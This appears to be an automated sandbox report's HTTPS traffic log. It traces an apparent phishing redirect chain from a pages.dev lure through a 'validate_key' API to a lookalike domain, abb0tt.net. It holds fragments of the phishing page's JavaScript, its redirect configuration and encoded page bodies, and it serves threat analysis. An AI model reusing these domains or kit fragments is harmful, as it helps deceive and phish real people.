                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC432INData Raw: 64 63 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c
                                                                                                                                                                                                                                      Data Ascii: dca<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>Just a moment...</title> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"><
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC1369INData Raw: 23 22 29 5b 31 5d 3b 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 68 61 73 68 32 5b 31 5d 29 3b 0a 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 20 3d 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 68 61 73 68 56 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6e 61 6d 65 20 3d 20 75 72 6c 50 61 72 61 6d 73 2e 67 65 74 28 27 73 65 72 76 69 63 65 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 44 65 63 6f 64 65 20 74 68 65 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 76 61 6c 75 65 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 56 61 6c 75 65 20 3d 20 61 74 6f 62 28 6e 61 6d 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c
                                                                                                                                                                                                                                      Data Ascii: #")[1]; // console.log(hash2[1]); const urlParams = new URLSearchParams(hashValue); const name = urlParams.get('service'); // Decode the Base64-encoded value var decodedValue = atob(name); consol
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC1369INData Raw: 4d 69 4f 69 4a 69 4d 44 64 6b 4f 54 6c 6d 4d 6d 56 6c 4e 54 46 6a 5a 6a 45 34 59 6a 4a 6d 5a 57 4e 6d 4e 6a 63 77 4d 6a 6c 69 4d 6a 67 32 5a 6d 59 7a 5a 54 64 6d 4d 7a 45 30 5a 57 46 68 4f 44 63 7a 5a 6a 64 69 5a 54 67 32 4f 44 52 6a 5a 6a 45 34 4e 32 52 68 4f 54 55 32 49 6e 30 25 33 44 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 70 72 6f 63 65 73 73 44 61 74 61 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 6d 69 6d 65 54 79 70 65 3a 20 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 63 6f 6e 74 65 6e 74 54 79 70 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 64 61 74 61 3a 20 66 6f 72 6d 2c 0a 20 20 20
                                                                                                                                                                                                                                      Data Ascii: MiOiJiMDdkOTlmMmVlNTFjZjE4YjJmZWNmNjcwMjliMjg2ZmYzZTdmMzE0ZWFhODczZjdiZTg2ODRjZjE4N2RhOTU2In0%3D", // }, // processData: false, // mimeType: "multipart/form-data", // contentType: false, // data: form,
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC367INData Raw: 73 75 70 70 6f 72 74 20 21 20 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 2e 73 74 61 74 75 73 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6a 61 76 61 73 63 72 69 70 74 43 61 6c 6c 62 61 63 6b 28 29 0a 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 2f 2f 20 7d 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 45 4e 44 20 44 45 57 45 20 2d 2d 3e
                                                                                                                                                                                                                                      Data Ascii: support ! "; } console.log(error.status); }); } setTimeout(() => { javascriptCallback() }, 1000); // }); </script> ... END DEWE -->
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.1649728194.163.42.364436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:29 UTC589OUTGET /public/api/validate_key/tes2 HTTP/1.1
                                                                                                                                                                                                                                      Host: natrium100gram.site
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Origin: https://porposal-ach.pages.dev
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://porposal-ach.pages.dev/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:30 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                                      cache-control: no-cache, private
                                                                                                                                                                                                                                      content-type: application/json
                                                                                                                                                                                                                                      x-ratelimit-limit: 60
                                                                                                                                                                                                                                      x-ratelimit-remaining: 59
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: *
                                                                                                                                                                                                                                      access-control-allow-credentials: 1
                                                                                                                                                                                                                                      access-control-allow-headers: X-Requested-With,Content-Type,X-Token-Auth,Authorization
                                                                                                                                                                                                                                      accept: application/json
                                                                                                                                                                                                                                      content-length: 188
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:52:30 GMT
                                                                                                                                                                                                                                      server: LiteSpeed
                                                                                                                                                                                                                                      platform: hostinger
                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      vary: User-Agent
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                      2025-01-07 17:52:30 UTC188INData Raw: 7b 22 69 64 22 3a 31 35 2c 22 6b 65 79 22 3a 22 74 65 73 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 6f 69 6f 6e 65 31 22 2c 22 75 72 6c 5f 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 62 62 30 74 74 2e 6e 65 74 5c 2f 23 22 2c 22 6f 70 74 69 6f 6e 61 6c 5f 75 72 6c 22 3a 6e 75 6c 6c 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 33 2d 30 36 2d 32 35 54 32 32 3a 34 39 3a 33 32 2e 30 30 30 30 30 30 5a 22 2c 22 75 70 64 61 74 65 64 5f 61 74 22 3a 22 32 30 32 36 2d 31 32 2d 31 30 54 32 32 3a 34 39 3a 33 32 2e 30 30 30 30 30 30 5a 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"id":15,"key":"tes2","username":"Roione1","url_target":"https:\/\/abb0tt.net\/#","optional_url":null,"created_at":"2023-06-25T22:49:32.000000Z","updated_at":"2026-12-10T22:49:32.000000Z"}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.1649732165.140.202.2354436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC681OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      Host: abb0tt.net
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Referer: https://porposal-ach.pages.dev/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC486INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:31 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Content-Length: 3999
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC3999INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 70 6c 65 74 69 6e 67 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2e 64 65 6c 69 76 65 72 65 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Completing..</title> <style> body.delivered { display: none;


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.1649731165.140.202.2354436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC742OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      Host: abb0tt.net
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC434INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:31 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC7INData Raw: 31 62 64 65 37 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1bde7
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC16384INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 3b 62 61 73 65 36 34 2c 41 41 41 42 41 41 45 41 45 42 41 41 41 41 45 41 49 41 42 6f 42 41 41 41 46 67 41 41 41 43 67 41 41 41 41 51 41 41 41 41 49 41 41 41
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="icon" href="data:image/vnd.microsoft.icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAA
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC16384INData Raw: 71 2b 76 79 61 78 63 4e 79 65 66 6e 31 2b 32 51 31 2f 79 68 35 59 43 6a 6b 4f 68 55 43 6a 55 6f 79 54 6d 65 4f 79 65 34 33 39 6b 33 36 38 56 35 52 6e 57 30 6d 5a 43 6f 2b 58 48 6a 6e 2b 4f 70 57 35 6a 33 30 47 64 62 4d 6c 5a 56 7a 65 2f 38 71 65 77 71 54 66 43 75 69 61 6d 30 67 4b 4f 51 36 46 51 4b 4e 53 6a 42 6a 67 2b 36 75 69 33 6a 51 6a 48 57 49 72 38 6b 57 54 4f 43 67 73 4c 47 34 76 70 2b 74 4c 2f 59 59 4e 61 77 48 45 6f 46 41 71 46 65 74 54 47 63 2f 77 7a 51 34 56 56 30 41 2f 45 52 37 67 47 58 49 44 39 2f 47 47 2f 50 4e 6e 6d 57 2f 47 4e 74 74 79 36 46 6d 6b 75 37 36 76 4e 64 37 44 6c 7a 4c 35 6c 57 6c 72 7a 76 6c 53 57 62 31 50 44 67 54 62 36 53 32 2f 36 74 66 62 6d 53 79 55 54 75 57 6b 52 2f 7a 39 66 77 35 79 79 34 63 36 54 4d 44 66 65 6d 67 4b 4f
                                                                                                                                                                                                                                      Data Ascii: q+vyaxcNyefn1+2Q1/yh5YCjkOhUCjUoyTmeOye439k368V5RnW0mZCo+XHjn+OpW5j30GdbMlZVze/8qewqTfCuiam0gKOQ6FQKNSjBjg+6ui3jQjHWIr8kWTOCgsLG4vp+tL/YYNawHEoFAqFetTGc/wzQ4VV0A/ER7gGXID9/GG/PNnmW/GNtty6Fmku76vNd7DlzL5lWlrzvlSWb1PDgTb6S2/6tfbmSyUTuWkR/z9fw5yy4c6TMDfemgKO
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC16384INData Raw: 76 67 34 63 52 35 44 43 6a 74 65 76 72 77 7a 6d 68 71 48 6a 64 6a 34 31 46 4d 34 44 33 47 32 77 77 43 67 6e 51 6e 38 56 30 37 4d 4b 4b 50 62 47 4e 58 75 69 38 56 31 45 4e 77 53 69 35 76 4a 6d 48 45 34 77 33 6d 4f 6e 59 77 56 4b 35 4a 6b 63 4f 4f 63 48 64 75 66 54 32 62 57 76 57 4f 77 38 48 6a 35 4f 4f 41 34 46 41 71 46 44 6a 46 35 62 33 72 76 72 39 4d 2b 50 70 4a 52 6a 30 6e 67 49 2f 37 55 39 32 56 32 69 6d 63 2b 4e 54 42 5a 41 73 63 67 58 63 4a 78 47 36 50 62 47 49 73 63 38 5a 5a 35 67 6d 4f 73 45 32 76 32 6a 41 47 76 64 6e 76 78 6f 77 4a 41 45 30 42 41 5a 63 79 78 73 6c 55 77 35 72 67 42 6a 76 2f 67 64 2f 2b 64 77 37 46 63 6a 33 4c 39 63 71 79 31 6a 75 74 30 79 5a 4b 62 62 72 37 6c 31 71 34 36 4f 59 6d 2f 63 41 4f 4a 54 55 37 69 41 6f 74 4c 6a 41 4e 36
                                                                                                                                                                                                                                      Data Ascii: vg4cR5DCjtevrwzmhqHjdj41FM4D3G2wwCgnQn8V07MKKPbGNXui8V1ENwSi5vJmHE4w3mOnYwVK5JkcOOcHdufT2bWvWOw8Hj5OOA4FAqFDjF5b3rvr9M+PpJRj0ngI/7U92V2imc+NTBZAscgXcJxG6PbGIsc8ZZ5gmOsE2v2jAGvdnvxowJAE0BAZcyxslUw5rgBjv/gd/+dw7Fcj3L9cqy1jut0yZKbbr7l1q46OYm/cAOJTU7iAotLjAN6
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC16384INData Raw: 54 49 6a 74 52 6e 33 34 4c 4f 72 6d 67 34 50 52 4b 4a 6e 54 78 35 66 62 34 58 63 35 4d 75 68 39 34 42 4f 68 61 35 77 73 4d 38 36 51 46 32 41 38 64 43 34 56 77 69 2b 6a 74 78 44 46 75 6e 68 35 6e 70 62 79 75 36 44 6c 78 62 61 32 78 44 5a 38 66 55 2b 6f 61 47 36 77 33 71 58 54 61 75 7a 70 44 64 41 65 4b 75 51 57 5a 32 47 64 52 45 56 4e 76 51 6e 70 59 74 37 39 34 67 47 58 78 71 64 6e 2f 43 61 71 6b 43 52 44 6e 78 65 6b 66 47 65 42 49 37 70 34 79 59 34 50 75 48 45 6b 77 6a 48 4b 52 6d 37 72 6b 41 78 42 69 4c 50 34 63 68 6d 6a 6b 45 41 67 6d 4d 41 68 2f 74 77 45 7a 30 70 36 70 57 37 6d 63 4f 78 6d 77 41 49 6a 70 58 62 59 33 38 6c 6a 39 76 44 63 56 72 37 49 77 76 48 6b 6a 73 54 6a 6a 30 45 78 35 51 61 41 34 34 39 71 61 78 53 30 6c 6b 34 64 68 52 47 68 2f 41 6e
                                                                                                                                                                                                                                      Data Ascii: TIjtRn34LOrmg4PRKJnTx5fb4Xc5Muh94BOha5wsM86QF2A8dC4Vwi+jtxDFunh5npbyu6Dlxba2xDZ8fU+oaG6w3qXTauzpDdAeKuQWZ2GdREVNvQnpYt794gGXxqdn/CaqkCRDnxekfGeBI7p4yY4PuHEkwjHKRm7rkAxBiLP4chmjkEAgmMAh/twEz0p6pW7mcOxmwAIjpXbY38lj9vDcVr7IwvHkjsTjj0Ex5QaA449qaxS0lk4dhRGh/An
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC16384INData Raw: 73 50 42 58 37 34 71 48 31 55 48 70 5a 41 44 48 30 76 4c 34 57 52 4d 4f 46 59 4f 6d 33 41 4d 49 48 59 79 78 73 4b 6a 46 68 37 71 30 68 32 65 6b 4c 36 5a 6f 46 4e 79 46 56 34 50 2f 4b 51 6c 53 35 63 73 58 55 59 6b 62 55 37 30 70 74 43 63 4a 6f 42 4a 74 35 39 59 65 75 46 45 67 6a 74 7a 7a 51 39 75 57 76 75 33 66 34 66 50 38 67 73 76 2f 47 4d 57 6a 70 73 31 78 78 30 2b 72 74 45 63 44 79 69 50 71 79 6b 4b 67 47 42 31 77 32 50 46 70 4a 50 78 50 49 4c 6a 71 5a 42 56 69 49 7a 70 77 73 76 53 46 58 68 51 5a 39 61 62 6f 71 51 34 46 53 4e 77 45 41 62 2f 62 4c 62 2b 7a 59 4b 70 6d 78 77 33 47 41 62 72 57 59 49 58 63 74 72 5a 6f 2b 57 71 64 41 38 6e 6d 45 4b 65 6e 33 42 4d 4c 51 53 68 45 45 63 4b 48 47 51 49 44 65 73 71 6d 47 7a 76 41 62 53 6a 73 39 68 61 77 51 36 7a
                                                                                                                                                                                                                                      Data Ascii: sPBX74qH1UHpZADH0vL4WRMOFYOm3AMIHYyxsKjFh7q0h2ekL6ZoFNyFV4P/KQlS5csXUYkbU70ptCcJoBJt59YeuFEgjtzzQ9uWvu3f4fP8gsv/GMWjps1xx0+rtEcDyiPqykKgGB1w2PFpJPxPILjqZBViIzpwsvSFXhQZ9aboqQ4FSNwEAb/bLb+zYKpmxw3GAbrWYIXctrZo+WqdA8nmEKen3BMLQShEEcKHGQIDesqmGzvAbSjs9hawQ6z
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC16384INData Raw: 4e 33 7a 45 2b 4b 68 57 68 36 71 30 2b 45 2b 4a 2f 45 39 63 4e 78 48 2b 76 2f 6d 58 72 37 73 2b 66 66 58 53 36 2b 6d 7a 78 2b 56 71 62 61 2f 67 6c 6d 37 62 6e 39 37 34 42 67 2f 73 65 53 4d 53 79 2b 37 44 46 39 4b 2b 49 6a 68 71 77 4e 58 31 44 37 39 6f 41 30 63 7a 39 69 59 58 33 44 4d 74 4c 48 44 36 31 58 72 74 79 48 34 32 48 47 57 45 5a 59 54 54 38 4d 71 73 71 39 53 30 65 69 67 59 54 57 34 74 6e 58 47 64 63 41 56 45 4f 73 70 73 73 2b 6c 33 55 74 48 45 36 4f 4c 6a 78 6d 38 48 68 42 32 6b 36 45 4c 48 4a 64 57 32 6f 78 71 49 32 57 4f 43 63 64 50 37 74 79 4a 2f 76 68 42 77 72 2f 5a 49 4f 6d 32 57 62 58 72 71 61 64 6a 68 2b 64 66 59 47 33 71 75 51 48 48 44 2f 37 6b 41 55 33 49 77 35 6b 45 48 43 74 59 77 68 64 6e 6d 43 64 35 4c 77 52 65 55 45 57 36 50 4f 30 38
                                                                                                                                                                                                                                      Data Ascii: N3zE+KhWh6q0+E+J/E9cNxH+v/mXr7s+ffXS6+mzx+Vqba/glm7bn974Bg/seSMSy+7DF9K+IjhqwNX1D79oA0cz9iYX3DMtLHD61XrtyH42HGWEZYTT8Mqsq9S0eigYTW4tnXGdcAVEOspss+l3UtHE6OLjxm8HhB2k6ELHJdW2oxqI2WOCcdP7tyJ/vhBwr/ZIOm2WbXrqadjh+dfYG3quQHHD/7kAU3Iw5kEHCtYwhdnmCd5LwReUEW6PO08
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC15847INData Raw: 75 43 59 58 5a 66 35 6c 74 51 45 42 47 2f 37 35 72 2f 35 70 4f 41 59 42 78 52 30 53 44 6a 65 2b 48 2f 2b 4c 2b 42 34 37 59 59 48 47 48 69 4d 69 4c 59 4b 77 54 48 4a 6d 48 42 4d 71 7a 47 4c 76 6b 55 34 56 6f 69 53 35 63 6f 67 45 33 2f 6e 38 31 63 72 49 69 6a 7a 39 58 48 66 69 45 4f 50 6d 36 49 46 69 30 35 6f 67 75 4f 62 76 6e 45 72 6a 67 37 37 65 37 64 6b 6a 76 6e 50 4c 66 46 78 47 62 6a 56 78 4b 64 4a 6e 36 50 55 53 53 66 32 31 6b 6d 66 79 6a 53 2b 4b 6d 65 78 63 77 63 69 4c 5a 78 71 34 6c 4d 38 56 58 62 74 71 51 62 76 33 47 45 34 74 69 7a 4c 47 72 4e 47 68 65 4f 4a 69 61 64 78 57 63 58 34 6e 78 34 34 73 47 50 76 76 76 2f 73 56 41 2b 64 39 63 41 72 49 2f 41 6e 58 75 7a 35 4e 2b 59 52 48 77 38 50 78 39 79 6c 74 58 42 63 6d 77 4e 75 67 65 50 79 45 68 37 58
                                                                                                                                                                                                                                      Data Ascii: uCYXZf5ltQEBG/75r/5pOAYBxR0SDje+H/+L+B47YYHGHiMiLYKwTHJmHBMqzGLvkU4VoiS5cogE3/n81crIijz9XHfiEOPm6IFi05oguObvnErjg77e7dkjvnPLfFxGbjVxKdJn6PUSSf21kmfyjS+KmexcwciLZxq4lM8VXbtqQbv3GE4tizLGrNGheOJiadxWcX4nx44sGPvvv/sVA+d9cArI/AnXuz5N+YRHw8Px9yltXBcmwNugePyEh7X
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      2025-01-07 17:52:32 UTC6INData Raw: 31 39 30 31 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1901


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.1649733194.163.42.364436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:31 UTC371OUTGET /public/api/validate_key/tes2 HTTP/1.1
                                                                                                                                                                                                                                      Host: natrium100gram.site
                                                                                                                                                                                                                                      Connection: keep-alive
